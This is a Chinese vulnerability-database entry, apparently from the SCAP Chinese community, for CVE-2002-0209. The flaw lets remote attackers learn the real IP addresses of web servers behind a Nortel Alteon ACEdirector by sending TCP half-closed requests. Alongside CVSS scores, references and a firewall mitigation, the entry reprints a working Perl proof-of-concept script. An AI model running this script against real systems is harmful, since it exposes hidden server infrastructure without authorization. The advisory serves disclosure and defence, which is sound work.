CVE-2002-0209
CVSS5.0
发布时间 :2002-05-16 00:00:00
修订时间 :2008-09-10 20:00:43
NMCOE    

[原文]Nortel Alteon ACEdirector WebOS 9.0, with the Server Load Balancing (SLB) and Cookie-Based Persistence features enabled, allows remote attackers to determine the real IP address of a web server with a half-closed session, which causes ACEdirector to send packets from the server without changing the address to the virtual IP address.


[CNNVD]Alteon AceDirector半开连接HTTP请求导致真实IP地址泄露漏洞(CNNVD-200205-009)

        
        Alteon ACEdirector是一个由Nortel Networks公司提供的HTTP服务器负载平衡硬件解决方案。ACEdirector运行Nortel WebOS操作系统。
        ACEdirector的设计存在问题,可以使远程攻击者得到ACEdirector所管理的真实的IP地址。
        当有客户端连接ACEdirector代表的虚拟IP地址时,连接被负载均衡重定向到后面服务器池中的某个服务器,并使用cookie和session id进行跟踪,但连接还是被修改成象是来自ACEdirector。当客户端使用半开连接方式连接ACEdirector时,负载均衡系统就不会调节网络流量,网络流量看起来就会来自服务器真实的IP。
        

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0209
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0209
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200205-009
(官方数据源) CNNVD

- 其它链接及资源

http://www.iss.net/security_center/static/8010.php
(VENDOR_ADVISORY)  XF  acedirector-http-reveal-ip(8010)
http://online.securityfocus.com/archive/1/252455
(VENDOR_ADVISORY)  BUGTRAQ  20020125 Alteon ACEdirector signature/security bug
http://www.securityfocus.com/bid/3964
(UNKNOWN)  BID  3964
http://online.securityfocus.com/archive/1/261548
(UNKNOWN)  BUGTRAQ  20020312 Re: Alteon ACEdirector signature/security bug

- 漏洞信息

Alteon AceDirector半开连接HTTP请求导致真实IP地址泄露漏洞
中危 设计错误
2002-05-16 00:00:00 2005-05-02 00:00:00
远程  
        
        Alteon ACEdirector是一个由Nortel Networks公司提供的HTTP服务器负载平衡硬件解决方案。ACEdirector运行Nortel WebOS操作系统。
        ACEdirector的设计存在问题,可以使远程攻击者得到ACEdirector所管理的真实的IP地址。
        当有客户端连接ACEdirector代表的虚拟IP地址时,连接被负载均衡重定向到后面服务器池中的某个服务器,并使用cookie和session id进行跟踪,但连接还是被修改成象是来自ACEdirector。当客户端使用半开连接方式连接ACEdirector时,负载均衡系统就不会调节网络流量,网络流量看起来就会来自服务器真实的IP。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 在客户机与ACEdirector之间设置防火墙。
        厂商补丁:
        Nortel Networks
        ---------------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.nortelnetworks.com/products/01/acedir/

- 漏洞信息 (21243)

Alteon AceDirector Half-Closed HTTP Request IP Address Revealing Vulnerabililty (EDBID:21243)
hardware remote
2001-12-20 Verified
0 Dave Plonka
N/A [点击下载]
source: http://www.securityfocus.com/bid/3964/info

Alteon ACEdirector is a hardware solution distributed by Nortel Networks. ACEdirector runs the Nortel WebOS operating system.

It is possible to retrieve the real IP addresses of webservers that are managed by an ACEdirector. When a client is connected to a webserver via the virtual IP address of the ACEdirector, the connection to a web server in the load balanced pool is tracked by a cookie and session id, and the traffic is altered to appear as though it is coming from the ACEdirector.

When a client has half-closed a connection to the ACEdirector, the load balancer will no longer alter the traffic to the client to appear as though it is coming from the ACEdirector's IP address. The traffic will continue to come from the webserver, but will instead come from the real IP address of the web server.

#! /usr/local/bin/perl

# acedirector_request - trivial script to do an HTTP Simple-Request of "/"
#                       utilizing TCP half-close.
#
#                       This script was written to demonstrate how one can
#                       elicit erroneous behavior from an Alteon/Nortel
#                       ACEdirector which has been configured to use its
#                       "Server Load Balancing" (SLB) and "Cookie-Based
#                       Persistence" features.
#
# Dave Plonka <plonka@doit.wisc.edu>, Dec 20 2001

use IO::Socket;
use FindBin;
use Getopt::Std;

if (!getopts('c:') or '' eq $ARGV[0]) {
   die "usage: $FindBin::Script [-c COOKIE] web_server\n"
}

my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                 PeerPort => 'http(80)',
				 Proto    => 'tcp');
die unless ref($sock);

if (!$opt_c) {
   print $sock "GET /\r\n";
} else {
   print $sock "GET / HTTP/1.0\r\nCookie: ${opt_c}=X\r\n\r\n";
}

$sock->shutdown(1);

@response = <$sock>;

if (@response) {
   print join("\n", @response)
} else {
   if ($opt_c) {
      my $command = "tcpdump -nv tcp and port 80 and not host $ARGV[0]";
      warn "$ARGV[0] did not respond to TCP half-closed request.\n" .
           " Launching tcpdump to watch for RST...\n";
      system($command . " 2>&1");
      if (0 != ($?/256)) {
         warn "\"$command\" failed.\n"
      }
   } else {
      warn "$ARGV[0] did not response to TCP half-closed request.\n" .
	   "It might be an ACEdirector.\n"
   }
}

exit		

- 漏洞信息

2035
Alteon AceDirector Half-Closed HTTP Request IP Address Revealing

- 漏洞描述

Nortel Alteon ACEdirector WebOS 9.0, with the Server Load Balancing (SLB) and Cookie-Based Persistence features enabled, allows remote attackers to determine the real IP address of a web server with a half-closed session, which causes ACEdirector to send packets from the server without changing the address to the virtual IP address.

- 时间线

2002-01-25 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站